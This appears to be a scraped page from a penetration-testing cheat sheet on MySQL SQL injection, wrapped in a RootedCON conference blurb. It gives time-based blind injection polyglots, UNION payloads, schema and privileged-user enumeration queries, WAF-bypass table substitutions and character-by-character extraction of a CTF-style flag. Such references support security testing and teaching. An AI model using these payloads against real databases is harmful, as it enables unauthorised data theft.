RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Remember that in "modern" versions of MySQL you can substitute "information_schema.tables" for "mysql.innodb_table_stats" (This could be useful to bypass WAFs).
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Getname of the tablesSELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT<COLUMN1>,<COLUMN2>FROM<TABLE_NAME>; #GetvaluesSELECT user FROM mysql.user WHERE file_priv='Y'; #Users withfile privileges
Only 1 value
group_concat()
Limit X,1
Blind one by one
substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
Remember that in "modern" versions of MySQL you can substitute information_schema.tables for mysql.innodb_table_stats or for sys.x$schema_flattened_keys or for sys.schema_table_statistics
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
Retrieving values without the column name
If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
# When a True is returned, you have found the number of columnsselect (select "", "") = (SELECT*fromdemolimit1); # 2columnsselect (select "", "", "") < (SELECT*fromdemolimit1); # 3columns
Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
# When True, you found the correct char and can start ruteforcing the next positionselect (select 1, 'flaf') = (SELECT*fromdemolimit1);
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.